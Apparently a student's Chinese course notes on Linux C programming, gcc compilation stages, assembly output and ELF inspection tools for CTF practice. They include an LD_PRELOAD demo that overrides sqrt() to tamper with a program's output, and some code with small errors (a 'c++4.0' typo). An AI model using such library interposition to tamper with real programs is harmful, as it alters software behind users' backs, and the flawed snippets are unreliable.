SecurityFocus Online

Linux C

編譯與執行

範例1:輸入與輸出

1
#include <stdio.h>
2

3
int main(void) {
4
  float miles;
5

6
  printf("Please enter miles:");
7
  scanf("%f", &miles);
8

9
  float kilometers = miles * 1.6;
10

11
  printf("%f Kilometers", kilometers);
12
}

執行與編譯結果

輸入
結果
理解與構思：英里轉公里 float kilometers = miles * 1.6;英里是公里的1.6倍，所以直接乘以1.6即可

範例3:格式化輸入與輸出 | 算術運算子（Arithmetic Operators）

1
#include <stdio.h>
2
#include <math.h>
3

4
int main()
5
{
6
   float a = 1.0, b = 6.0, c++4.0;
7
   printf ("%.4f", sqrt(a+b*c));
8
   return 0;
9
}

執行與編譯結果

輸入
過程中報錯
/usr/bin/ld: /tmp/ccFkUuaF.o: in function `main': PLAYGROUND.c:(.text+0x38): undefined reference to `sqrt' collect2: error: ld returned 1 exit status
修復報錯 sqrt需要連結 math 函式庫。但在Linux中，這個函式庫通常被稱為 libm，因此需要在編譯時告訴編譯器連結 libm。所以編譯指令需要這去寫： gcc PLAYGROUND.c -lm -o PLAYGROUND
結果

範例11:迴圈設計

練習作業:在console端輸入n == > 輸出:n!=1_2_3*….*n的結果
- 使用三種loop技術撰寫

1
//FOR LOOP
2
#include <stdio.h>
3
int main(){
4
    int n, i, sum = 1; //由於是階乘，故sum = 1 必為預設
5
    printf("Enter a positive integer: ");
6
    scanf("%d", &n);
7
    for (i = 1; i <= n; ++i){
8
        sum *= i;
9
    }
10
    printf("Sum = %d", sum);
11
    return 0;
12
}

輸入與結果

1
//WHILE LOOP
2
#include <stdio.h>
3
int main(){
4
    int n, i, sum = 1;
5
    printf("Enter a positive integer: ");
6
    scanf("%d", &n);
7
    i = 1;
8
    while (i <= n){
9
        sum *= i;
10
        ++i;
11
    }
12
    printf("Sum = %d", sum);
13
    return 0;
14
}

1
//DO While LOOP
2
#include <stdio.h>
3
int main() {
4
    int n, i, sum = 1;
5
    printf("Enter a positive integer: ");
6
    scanf("%d", &n);
7
    i = 1;
8
    do{
9
      sum *= i;
10
      ++i;
11
    } while (i <= n);
12
    printf("Sum = %d", sum);
13
    return 0;
14
}

練習作業:底下輸出結果是多少? and why?

1
#include <stdio.h>
2
#include <stdlib.h>
3
int main(void) {
4
  int x;
5
  float y;
6
  for (x=0, y=50; x<25; x+=5, y/=2)
7
    printf("x=%d, y=%4.2f\n", x, y);
8
  return 0;
9
}

輸入與結果

- 結果

解釋：
1. 初始時，x 設為 0，y 設為 50。
2. 進入循環，輸出 x 和 y 的值。
3. 在每次循環中，x 都增加 5，y 都除以 2。
4. 循環結束條件是 x < 25，當 x 達到或超過 25 時，循環停止。

範例16:費式序列Fibonacci Serie

費式序列Fibonacci Series: 0 1 1 2 3 5 8 13 21 34
f(0)=0, f(1)=1, f(n)=f(n-1)+f(n-2)
底下是用迴圈方式計算費式序列Fibonacci Serie
==作業:使用遞迴函數方式計算費式序列Fibonacci Serie==

1
// 遞迴
2
#include <stdio.h>
3
long long f(int n){
4
    if(n==0) return 0;
5
    if(n==1) return 1;
6
    return f(n-1)+f(n-2);
7
}
8
int main(){
9
    int n;
10
    scanf("%d",&n);
11
    printf("%lld",f(n));
12
}

輸入與結果

1
//遞迴解法2 （減少計算重複項目）
2
#include <stdio.h>
3
long long F[1000005];
4
long long f(int n) {
5
    if (n == 0) return 0;
6
    if (n == 1) return 1;
7
    if (F[n] != -1) return F[n];
8
    F[n] = f(n - 1) + f(n - 2);
9
    return F[n];
10
}
11
int main() {
12
    for (int i = 0; i < 1000000; i++){
13
        F[i] = -1;
14
    }
15
    int n;
16
    scanf("%d", &n);
17
    printf("%lld\n", f(n));
18
    return 0;
19
}

輸入與結果
原理與解釋

long long F[1000005];: 宣告一個陣列 F 用來存儲 Fibonacci 數列的計算結果。
long long f(int n): 定了一個遞迴函數 f，用來計算 Fibonacci 數列的第 n 項。如果 n 為 0，返回 0；如果 n 為 1，返回 1。如果 F[n] 不等於 -1，==表示已經計算過 f(n)，直接返回 F[n]==；否則，計算 f(n-1) + f(n-2) 並將結果存入 F[n]，最後返回 F[n]。

從原始碼到可執行檔

1
#include <stdio.h>
2

3
#define FORMAT_STRING "%s"  //定義FORMAT_STRING為%s字串輸出
4
#define MESSAGE "Hello, CTFer!\n" //定義MESSAGE為要輸出的字串內容
5

6
int
7
main(int argc, char *argv[]) {
8
  printf(FORMAT_STRING, MESSAGE); //輸出結果然後換行
9
  return 0;
10
}

輸入與結果

gcc的參數

原始程式: PLAYGROUND.c
預處理階段 ==> gcc –E PLAYGROUND.c –o PLAYGROUND.i
編譯階段 ==> gcc –S PLAYGROUND.i –o PLAYGROUND.s
組譯階段 ==> gcc –c PLAYGROUND.s –o PLAYGROUND.o
連結階段 ==> gcc PLAYGROUND.o –o PLAYGROUND
export LD_LIBRARY_PATH=.

原程式->PLAYGROUND.c

1
#include <stdio.h>
2
int main(){
3
    printf("Wu YiHung\n");
4
   return 0;
5
}

輸入

預處理階段 ==> gcc -E PLAYGROUND.c -o PLAYGROUND.i
- 輸入與結果
  - 確認有.i的檔案
  - 嘗試打開，出現，這個階段是將標頭檔stdio.h爆開

1
# 0 "PLAYGROUND.c"
2
# 0 "<built-in>"
3
# 0 "<command-line>"
4
# 1 "/usr/include/stdc-predef.h" 1 3 4
5
# 0 "<command-line>" 2
6
# 1 "PLAYGROUND.c"
7
# 1 "/usr/include/stdio.h" 1 3 4
8
# 27 "/usr/include/stdio.h" 3 4
9
# 1 "/usr/include/aarch64-linux-gnu/bits/libc-header-start.h" 1 3 4
10
# 33 "/usr/include/aarch64-linux-gnu/bits/libc-header-start.h" 3 4
11
# 1 "/usr/include/features.h" 1 3 4
12
# 392 "/usr/include/features.h" 3 4
13
# 1 "/usr/include/features-time64.h" 1 3 4
14
# 20 "/usr/include/features-time64.h" 3 4
15

16
~~~中間省略數百行
17

18
extern void funlockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
19
# 885 "/usr/include/stdio.h" 3 4
20
extern int __uflow (FILE *);
21
extern int __overflow (FILE *, int);
22
# 902 "/usr/include/stdio.h" 3 4
23

24
# 2 "PLAYGROUND.c" 2
25

26
# 2 "PLAYGROUND.c"
27
int main(){
28
    printf("Wu YiHung\n");
29
   return 0;
30
}

編譯階段 ==> gcc -S PLAYGROUND.i -o PLAYGROUND.s

輸入與結果
執行後，產生.s檔
直接打開PLAYGROUND.s

1
yih@yih:~/Documents/C$ cat PLAYGROUND.s
2
    .arch armv8-a
3
    .file  "PLAYGROUND.c" //指定了文件的名稱
4
    .text
5
    .section  .rodata
6
    .align  3
7
.LC0:
8
    .string  "Wu YiHung"
9
    .text
10
    .align  2
11
    .global  main
12
    .type  main, %function //表示程式的開始
13
main:
14
.LFB0: //這是函數開始（LFB）標籤，下方是記憶體緩存暫存的地址(動態資訊)
15
    .cfi_startproc
16
    stp  x29, x30, [sp, -16]!
17
    .cfi_def_cfa_offset 16
18
    .cfi_offset 29, -16
19
    .cfi_offset 30, -8
20
    mov  x29, sp
21
    adrp  x0, .LC0
22
    add  x0, x0, :lo12:.LC0
23
    bl  puts
24
    mov  w0, 0
25
    ldp  x29, x30, [sp], 16
26
    .cfi_restore 30
27
    .cfi_restore 29
28
    .cfi_def_cfa_offset 0
29
    ret
30
    .cfi_endproc
31
.LFE0: //這是函數結束（LFE）標籤
32
    .size  main, .-main
33
    .ident  "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" //GCC 的版本
34
    .section  .note.GNU-stack,"",@progbits

組譯階段 ==> gcc -c PLAYGROUND.s -o PLAYGROUND.o
- 輸入與結果 - 執行後產生.o檔 - 開啟後，就出現了亂碼! - 只能從中得知是二進制文件（ELF格式的可執行文件）

連結階段 ==> gcc PLAYGROUND.o -o PLAYGROUND
- 輸入與結果
  - 執行後新增了PLAYGROUND檔
執行檔案 ==> ./PLAYGROUND

最後執行該結果

檢視檔案大小==> ls -al PLAYGROUND.*

組合語言格式:INTEL vs AT&T 格式

產生AT&T語法格式的組語(gcc預設使用的格式) ==> gcc -S -masm=att PLAYGROUND.c -o PLAYGROUND_att.s

發現問題，想到既然在gcc是預設，那何必加入這段？
確實可以

開啟後結果

PLAYGROUND_att.s

1
    .arch armv8-a
2
    .file  "PLAYGROUND.c"
3
    .text
4
    .section  .rodata
5
    .align  3
6
.LC0:
7
    .string  "Wu YiHung"
8
    .text
9
    .align  2
10
    .global  main
11
    .type  main, %function
12
main:
13
.LFB0:
14
    .cfi_startproc
15
    stp  x29, x30, [sp, -16]!
16
    .cfi_def_cfa_offset 16
17
    .cfi_offset 29, -16
18
    .cfi_offset 30, -8
19
    mov  x29, sp
20
    adrp  x0, .LC0
21
    add  x0, x0, :lo12:.LC0
22
    bl  puts
23
    mov  w0, 0
24
    ldp  x29, x30, [sp], 16
25
    .cfi_restore 30
26
    .cfi_restore 29
27
    .cfi_def_cfa_offset 0
28
    ret
29
    .cfi_endproc
30
.LFE0:
31
    .size  main, .-main
32
    .ident  "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0"
33
    .section  .note.GNU-stack,"",@progbits

產生Intel語法格式的組語(微軟預設使用的格式) ==> gcc -S -masm=intel PLAYGROUND.c -o PLAYGROUND_intel.s
- 發生問題
- 我用windows的windows powershell試看看，運行無報錯
- 運行結果

PLAYGROUND_intel.s

1
        .file   "PLAYGROUND.c"
2
        .intel_syntax noprefix
3
        .text
4
        .def    __main; .scl    2;      .type   32;     .endef
5
        .section .rdata,"dr"
6
.LC0:
7
        .ascii "Wu YiHung\0"
8
        .text
9
        .globl  main
10
        .def    main;   .scl    2;      .type   32;     .endef
11
        .seh_proc       main
12
main:
13
        push    rbp
14
        .seh_pushreg    rbp
15
        mov     rbp, rsp
16
        .seh_setframe   rbp, 0
17
        sub     rsp, 32
18
        .seh_stackalloc 32
19
        .seh_endprologue
20
        call    __main
21
        lea     rcx, .LC0[rip]
22
        call    puts
23
        mov     eax, 0
24
        add     rsp, 32
25
        pop     rbp
26
        ret
27
        .seh_endproc
28
        .ident  "GCC: (x86_64-win32-seh-rev0, Built by MinGW-W64 project) 8.1.0"
29
        .def    puts;   .scl    2;      .type   32;     .endef

比較之結果

LD_PRELOAD

實作範例與結果

範例程式

1
#include <stdio.h>
2
#include <math.h>
3
int main() {
4
  double x;
5
  scanf("%lf", &x);
6
  printf("%f\n", sqrt(x));
7
  return 0;
8
}

輸入
執行結果

駭入程式範例

1
double sqrt(double x) {
2
  return 1122334455;
3
}

編譯並執行看看被竄改的答案

執行指令
1. gcc -o inject.so -shared inject.c
2. LD_PRELOAD=./inject.so ./PLAYGROUND

比較

主要程式碼是要求輸入值的開根號，但有了inject.c的注入，不管輸入值是多少，僅會輸出二
- inject.c中的 retrun 1122334455;

Linux 執行檔分析

Linux file命令(command)

指令
- file /bin/ls
  - 結果
- file xxx.png
  - 結果
- file xxx.doc
  - 結果
- file xxx.pdf
  - 結果

strings

strings /bin/ls - 一堆東西
- strings /bin/ls | grep Copyright
  - 找到關鍵字
- strings hexedit | grep CTF
  - 結果

hexdump | hd

顯示執行畫面與解說

ELF(Executable and Linkable Format) 的檔案特徵
MP3 的檔案特徵
.jpg 的檔案特徵
.png 的檔案特徵

size

輸入與結果
在這個檔案中，總大小為 2806 bytes
hex（十六進位表示）：af6

先把檔案下載下來
輸入git clone https://github.com/MyFirstSecurity2020/DATA202401.git

DATA202401↗

DAY1

hexedit

直接先把檔案打開，就會看到flag，但這也很考驗眼力
可以用strings 然後在grep出來即可

networkingOK.pcap

也可以使用相同的方式

readelf

顯示 /bin/ls 二進位檔案的 ELF 表頭(ELF Header) ==> readelf -h /bin/ls

顯示Section Headers (-S 大寫) ==> readelf -S /bin/ls

此選項顯示有關 ELF 檔案中每個sections的詳細資訊。節標題包括名稱(Name)、類型(Type)、地址(Address)、大小和其他屬性。
完整結果 There are 28 section headers, starting at offset 0x1e428:

1
Section Headers:
2
  [Nr] Name              Type             Address           Offset
3
       Size              EntSize          Flags  Link  Info  Align
4
  [ 0]                   NULL             0000000000000000  00000000
5
       0000000000000000  0000000000000000           0     0     0
6
  [ 1] .interp           PROGBITS         0000000000000238  00000238
7
       000000000000001b  0000000000000000   A       0     0     1
8
  [ 2] .note.gnu.bu[...] NOTE             0000000000000254  00000254
9
       0000000000000024  0000000000000000   A       0     0     4
10
  [ 3] .note.ABI-tags     NOTE             0000000000000278  00000278
11
       0000000000000020  0000000000000000   A       0     0     4
12
  [ 4] .gnu.hash         GNU_HASH         0000000000000298  00000298
13
       0000000000000040  0000000000000000   A       5     0     8
14
  [ 5] .dynsym           DYNSYM           00000000000002d8  000002d8
15
       0000000000000bb8  0000000000000018   A       6     3     8
16
  [ 6] .dynstr           STRTAB           0000000000000e90  00000e90
17
       000000000000058f  0000000000000000   A       0     0     1
18
  [ 7] .gnu.version      VERSYM           0000000000001420  00001420
19
       00000000000000fa  0000000000000002   A       5     0     2
20
  [ 8] .gnu.version_r    VERNEED          0000000000001520  00001520
21
       0000000000000090  0000000000000000   A       6     3     8
22
  [ 9] .rela.dyn         RELA             00000000000015b0  000015b0
23
       0000000000001560  0000000000000018   A       5     0     8
24
  [10] .rela.plt         RELA             0000000000002b10  00002b10
25
       00000000000009c0  0000000000000018  AI       5    22     8
26
  [11] .init             PROGBITS         00000000000034d0  000034d0
27
       0000000000000018  0000000000000000  AX       0     0     4
28
  [12] .plt              PROGBITS         00000000000034f0  000034f0
29
       00000000000006a0  0000000000000000  AX       0     0     16
30
  [13] .text             PROGBITS         0000000000003bc0  00003bc0
31
       0000000000012640  0000000000000000  AX       0     0     64
32
  [14] .fini             PROGBITS         0000000000016200  00016200
33
       0000000000000014  0000000000000000  AX       0     0     4
34
  [15] .rodata           PROGBITS         0000000000016220  00016220
35
       000000000000487a  0000000000000000   A       0     0     16
36
  [16] .eh_frame_hdr     PROGBITS         000000000001aa9c  0001aa9c
37
       0000000000000564  0000000000000000   A       0     0     4
38
  [17] .eh_frame         PROGBITS         000000000001b000  0001b000
39
       0000000000002000  0000000000000000   A       0     0     8
40
  [18] .init_array       INIT_ARRAY       000000000002d000  0001d000
41
       0000000000000008  0000000000000008  WA       0     0     8
42
  [19] .fini_array       FINI_ARRAY       000000000002d008  0001d008
43
       0000000000000008  0000000000000008  WA       0     0     8
44
  [20] .data.rel.ro      PROGBITS         000000000002d010  0001d010
45
       0000000000000a08  0000000000000000  WA       0     0     8
46
  [21] .dynamic          DYNAMIC          000000000002da18  0001da18
47
       0000000000000210  0000000000000010  WA       6     0     8
48
  [22] .got              PROGBITS         000000000002dc28  0001dc28
49
       00000000000003d8  0000000000000008  WA       0     0     8
50
  [23] .data             PROGBITS         000000000002e000  0001e000
51
       0000000000000298  0000000000000000  WA       0     0     8
52
  [24] .bss              NOBITS           000000000002e298  0001e298
53
       00000000000012a8  0000000000000000  WA       0     0     8
54
  [25] .gnu_debugaltlink PROGBITS         0000000000000000  0001e298
55
       000000000000004a  0000000000000000           0     0     1
56
  [26] .gnu_debuglink    PROGBITS         0000000000000000  0001e2e4
57
       0000000000000034  0000000000000000           0     0     4
58
  [27] .shstrtab         STRTAB           0000000000000000  0001e318
59
       000000000000010f  0000000000000000           0     0     1
60
Key to Flags:
61
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
62
  L (link order), O (extra OS processing required), G (group), T (TLS),
63
  C (compressed), x (unknown), o (OS specific), E (exclude),
64
  D (mbind), p (processor specific)

顯示符號表 (-s 小寫) ==> readelf -s /bin/ls
- 符號表包含有關二進位檔案中使用的符號的信息，包括函數和變數。這對於理解程序邏輯非常寶貴。

1
    Symbol table '.dynsym' contains 125 entries:
2
   Num:    Value          Size Type    Bind   Vis      Ndx Name
3
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
4
     1: 00000000000034d0     0 SECTION LOCAL  DEFAULT   11 .init
5
     2: 000000000002e000     0 SECTION LOCAL  DEFAULT   23 .data
6
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND m[...]@GLIBC_2.17 (2)
7
     4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND memcpy@GLIBC_2.17 (2)
8
     5: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND m[...]@GLIBC_2.17 (2)
9
     6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _exit@GLIBC_2.17 (2)
10
     7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getcwd@GLIBC_2.17 (2)
11
     8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND f[...]@GLIBC_2.17 (2)
12
     9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strlen@GLIBC_2.17 (2)
13
    10: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
14
    11: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND m[...]@GLIBC_2.17 (2)
15
    12: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND exit@GLIBC_2.17 (2)
16
    13: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
17
    14: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND raise@GLIBC_2.17 (2)
18
    15: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.34 (3)
19
    16: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND error@GLIBC_2.17 (2)
20
    17: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND p[...]@GLIBC_2.17 (2)
21
    18: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_deregisterT[...]
22
    19: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
23
    20: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND l[...]@GLIBC_2.17 (2)
24
    21: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND setenv@GLIBC_2.17 (2)
25
    22: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND r[...]@GLIBC_2.17 (2)
26
    23: 0000000000000000     0 FUNC    WEAK   DEFAULT  UND _[...]@GLIBC_2.17 (2)
27
    24: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND o[...]@GLIBC_2.17 (2)
28
    25: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
29
    26: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
30
    27: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND i[...]@GLIBC_2.17 (2)
31
    28: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND c[...]@GLIBC_2.17 (2)
32
    29: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND stderr@GLIBC_2.17 (2)
33
    30: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND lseek@GLIBC_2.17 (2)
34
    31: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
35
    32: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND optarg@GLIBC_2.17 (2)
36
    33: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
37
    34: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
38
    35: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND l[...]@GLIBC_2.17 (2)
39
    36: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND fileno@GLIBC_2.17 (2)
40
    37: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
41
    38: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND signal@GLIBC_2.17 (2)
42
    39: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
43
    40: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
44
    41: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND fclose@GLIBC_2.17 (2)
45
    42: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND n[...]@GLIBC_2.17 (2)
46
    43: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND malloc@GLIBC_2.17 (2)
47
    44: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND optind@GLIBC_2.17 (2)
48
    45: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@LIBSELINUX_1.0 (4)
49
    46: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND w[...]@GLIBC_2.17 (2)
50
    47: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND tzset@GLIBC_2.17 (2)
51
    48: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND w[...]@GLIBC_2.17 (2)
52
    49: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
53
    50: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
54
    51: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND b[...]@GLIBC_2.17 (2)
55
    52: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND stdout@GLIBC_2.17 (2)
56
    53: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
57
    54: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND memset@GLIBC_2.17 (2)
58
    55: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND g[...]@GLIBC_2.17 (2)
59
    56: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND calloc@GLIBC_2.17 (2)
60
    57: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND lstat@GLIBC_2.33 (5)
61
    58: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND r[...]@GLIBC_2.17 (2)
62
    59: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND r[...]@GLIBC_2.17 (2)
63
    60: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
64
    61: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND c[...]@GLIBC_2.17 (2)
65
    62: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
66
    63: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
67
    64: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
68
    65: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND t[...]@GLIBC_2.17 (2)
69
    66: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
70
    67: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND mktime@GLIBC_2.17 (2)
71
    68: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (6)
72
    69: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
73
    70: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND abort@GLIBC_2.17 (2)
74
    71: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND m[...]@GLIBC_2.17 (2)
75
    72: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
76
    73: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND g[...]@GLIBC_2.17 (2)
77
    74: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND memcmp@GLIBC_2.17 (2)
78
    75: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND t[...]@GLIBC_2.17 (2)
79
    76: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
80
    77: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND g[...]@GLIBC_2.17 (2)
81
    78: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
82
    79: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
83
    80: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strcmp@GLIBC_2.17 (2)
84
    81: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND g[...]@GLIBC_2.17 (2)
85
    82: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
86
    83: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND fseeko@GLIBC_2.17 (2)
87
    84: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND free@GLIBC_2.17 (2)
88
    85: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
89
    86: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strchr@GLIBC_2.17 (2)
90
    87: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND statx@GLIBC_2.28 (7)
91
    88: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND fwrite@GLIBC_2.17 (2)
92
    89: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND f[...]@GLIBC_2.17 (2)
93
    90: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND f[...]@GLIBC_2.17 (2)
94
    91: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND fflush@GLIBC_2.17 (2)
95
    92: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strcpy@GLIBC_2.17 (2)
96
    93: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND dirfd@GLIBC_2.17 (2)
97
    94: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND u[...]@GLIBC_2.17 (2)
98
    95: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
99
    96: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND isatty@GLIBC_2.17 (2)
100
    97: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND w[...]@GLIBC_2.17 (2)
101
    98: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND g[...]@GLIBC_2.17 (2)
102
    99: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND f[...]@GLIBC_2.17 (2)
103
   100: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND p[...]@GLIBC_2.17 (2)
104
   101: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND d[...]@GLIBC_2.17 (2)
105
   102: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND f[...]@GLIBC_2.17 (2)
106
   103: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
107
   104: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
108
   105: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
109
   106: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
110
   107: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_registerTMC[...]
111
   108: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@LIBSELINUX_1.0 (4)
112
   109: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND i[...]@GLIBC_2.17 (2)
113
   110: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
114
   111: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.17 (2)
115
   112: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@LIBSELINUX_1.0 (4)
116
   113: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.17 (2)
117
   114: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND g[...]@GLIBC_2.17 (2)
118
   115: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND timegm@GLIBC_2.17 (2)
119
   116: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND ioctl@GLIBC_2.17 (2)
120
   117: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND s[...]@GLIBC_2.17 (2)
121
   118: 000000000002e270     8 OBJECT  GLOBAL DEFAULT   23 obstack_alloc_fa[...]
122
   119: 000000000000e4c0   336 FUNC    GLOBAL DEFAULT   13 _obstack_newchunk
123
   120: 000000000000e4a4    24 FUNC    GLOBAL DEFAULT   13 _obstack_begin_1
124
   121: 000000000000ee50    52 FUNC    GLOBAL DEFAULT   13 _obstack_allocated_p
125
   122: 000000000000e490    20 FUNC    GLOBAL DEFAULT   13 _obstack_begin
126
   123: 000000000000ef30    40 FUNC    GLOBAL DEFAULT   13 _obstack_memory_used
127
   124: 000000000000ee84   164 FUNC    GLOBAL DEFAULT   13 _obstack_free

顯示動態部分（-d) ==> readelf -d /bin/ls
- 此選項顯示動態連結訊息，包括共享庫依賴項和版本控制詳細資訊。
顯示程式表頭program headers（-l） ==> readelf -l /bin/ls
- 程式頭描述了二進位檔案中段的佈局。此資訊對於理解記憶體映射和可執行檔的載入位址至關重要。
顯示節標題及其內容 (-x)：此選項顯示特定節內容的十六進位和 ASCII 表示形式。
- 例如，要檢查 .text 部分： ==> readelf -x .text /bin/ls（太多了省略下半部）
顯示動態字串表(—dyn-syms) ==> readelf —dyn-syms /bin/ls
- 此選項列印動態符號，這對於動態連結分析至關重要。（太多了省略下半部）

Linux 執行檔分析_objdump

1.ELF 分析

指令參數

1
-h  顯示區段頭section headers
2
-g  顯示除錯資訊
3
-l  顯示行號資訊
4
-p  顯示專有檔頭資訊，具體內容取決於檔案格式
5
-f  顯示檔案檔頭
6
-r   顯示重定資訊
7
-R   顯示動態連結重定資訊
8
-s   顯示檔案所有內容
9
